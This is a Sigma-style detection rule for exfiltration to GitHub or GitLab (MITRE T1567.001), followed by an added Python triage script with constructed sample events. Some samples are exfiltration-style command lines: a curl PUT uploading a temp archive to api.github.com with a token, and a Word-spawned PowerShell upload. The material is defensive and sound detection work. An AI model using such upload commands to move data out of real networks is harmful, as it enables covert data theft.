title: Exfiltration to Code Repository (T1567.001)
id: df00tech-t1567-001
status: experimental
description: "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs is usually over HTTPS, which gives the adversary an additional level of protection because the uploaded payload is encrypted in transit and blends in with ordinary API traffic. Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. Tools such as Empire have been observed using GitHub for data exfiltration, leveraging the GitHub API to stage and retrieve data as part of a C2 channel."
references:
  - https://attack.mitre.org/techniques/T1567/001/
  - https://df00tech.com/detections/T1567.001
author: df00tech
date: 2026/04/21
tags:
  - attack.exfiltration
  - attack.t1567.001
# NOTE: logsource is auto-derived and may need adjustment for your environment.
# process_creation only shows the client being launched (curl, PowerShell, git,
# IDE helpers); it cannot see the HTTPS upload itself. Pair this rule with
# network_connection, proxy or DNS telemetry that records the destination host
# (api.github.com, uploads.github.com, gitlab.com) to confirm the exfiltration.
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  # The selection below is a PLACEHOLDER: 'EventID: *' matches every process_creation
  # event, so enabling this rule as-is at level high floods the SIEM. Replace it with
  # the translated logic before deployment.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Software developers legitimately pushing code to GitHub or GitLab as part of the normal development workflow, most commonly on developer workstations"
  - "CI/CD pipeline agents (Jenkins build servers, GitHub Actions self-hosted runners, GitLab CI runners) performing automated builds and deployments that push artifacts or release assets"
  - "Developer IDEs with integrated Git (VS Code, IntelliJ, Visual Studio) performing background sync, auto-push on save, or pull request creation via API"
  - Backup and configuration management scripts that legitimately use GitHub/GitLab as a storage backend for infrastructure-as-code or configuration files
  - "Security tools such as Dependabot, Renovate, or Snyk that create automated pull requests by pushing fix branches to repositories"
level: high
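The rule above ships with a placeholder selection, so the following is an added example of the kind of process_creation triage it would need; it is the editor's code, not df00tech's rule and not the KQL/SPL query the page references. It scores constructed Sysmon-style events (fields Image, CommandLine, ParentImage, User) by whether a code-hosting API host appears on the command line, whether the client is sending rather than fetching (curl and Invoke-RestMethod upload switches), whether an access token is passed inline, and whether the parent is an Office document handler or one of the developer tools from the falsepositives list. The host list, switch list, parent lists, threshold and all sample events are assumptions to tune per environment.

```python
"""Heuristic triage of process_creation events for T1567.001.

Added example, not df00tech's detection. Field names follow Sysmon Event ID 1;
every event in SAMPLE_EVENTS is constructed for illustration, not real telemetry.
"""
from __future__ import annotations

import re
from pathlib import PureWindowsPath

# REST API hosts named or implied by the technique description (assumed list).
REPO_API_HOST_RE = re.compile(
    r"(?i)https?://(api\.github\.com|uploads\.github\.com|gitlab\.com/api/v4)\b"
)

# Switches that mean data is being sent, not fetched: curl -d/--data*/-T/-F/-X,
# PowerShell Invoke-WebRequest / Invoke-RestMethod -Method/-Body/-InFile.
UPLOAD_RE = re.compile(
    r"(?i)(?:^|\s)(?:-d|--data(?:-binary|-raw)?|-T|--upload-file|-F|--form"
    r"|-X\s*(?:POST|PUT|PATCH)|-Method\s+(?:POST|PUT|PATCH)|-Body|-InFile)\b"
)

# GitHub / GitLab personal access token prefixes visible on the command line.
TOKEN_RE = re.compile(r"\b(?:ghp_|github_pat_|glpat-)[A-Za-z0-9_]{8,}")

# Parents whose children should not normally upload to a code-hosting API.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}

# Developer tooling from the falsepositives list (IDEs, CI runners). A child of
# these parents gets a lower score, not a free pass. Assumed list; tune locally.
DEV_TOOL_PARENTS = {"code.exe", "idea64.exe", "devenv.exe",
                    "runner.listener.exe", "runner.worker.exe", "gitlab-runner.exe"}

ALERT_THRESHOLD = 3  # assumption: host + upload switch is enough to alert


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process_creation event."""
    cmd = event.get("CommandLine", "")
    reasons: list[str] = []
    if not REPO_API_HOST_RE.search(cmd):
        return 0, reasons  # the technique needs the repository API; nothing to see
    score = 1
    reasons.append("code-hosting API host in command line")
    if UPLOAD_RE.search(cmd):
        score += 2
        reasons.append("upload switch present (sending, not fetching)")
    if TOKEN_RE.search(cmd):
        score += 1
        reasons.append("access token passed on command line")
    parent = basename(event.get("ParentImage", ""))
    if parent in OFFICE_PARENTS:
        score += 2
        reasons.append(f"spawned by document handler {parent}")
    elif parent in DEV_TOOL_PARENTS:
        score -= 2
        reasons.append(f"developer tooling parent {parent} (see falsepositives)")
    return max(score, 0), reasons


def triage(events: list[dict]) -> list[dict]:
    """Return one alert per event whose score reaches ALERT_THRESHOLD."""
    alerts = []
    for event in events:
        score, reasons = score_event(event)
        if score >= ALERT_THRESHOLD:
            alerts.append({"User": event.get("User"), "Image": basename(event.get("Image", "")),
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"User": "ACME\\alice", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'curl.exe -s -X PUT -H "Authorization: token ghp_EXAMPLE0000000000000000" '
                    r"--data-binary @C:\Users\alice\AppData\Local\Temp\q.7z "
                    r"https://api.github.com/repos/acme/notes/contents/q.7z"},
    {"User": "ACME\\bob", "Image": r"C:\Program Files\Git\cmd\git.exe",
     "ParentImage": r"C:\Users\bob\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": "git.exe push origin feature/login"},
    {"User": "ACME\\carol", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": 'powershell.exe -NoP -C "Invoke-RestMethod -Uri '
                    'https://api.github.com/repos/acme/notes/contents/out.bin '
                    '-Method PUT -Headers $h -Body $b"'},
    {"User": "ACME\\dave", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "curl.exe -s https://api.github.com/repos/acme/app/releases/latest"},
    {"User": "NT AUTHORITY\\SYSTEM", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\actions-runner\bin\Runner.Worker.exe",
     "CommandLine": "curl.exe -X POST -d @release.json https://api.github.com/repos/acme/app/releases"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Only the two sending processes reach the threshold: curl uploading a temp-directory archive with a token on its command line, and the PowerShell client spawned by Word. The VS Code-driven git push never touches the API host, the release-metadata GET carries no upload switch, and the CI runner's release upload is pulled back under the threshold by its parent. Confirmation still belongs in network or proxy telemetry, as the logsource note says.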
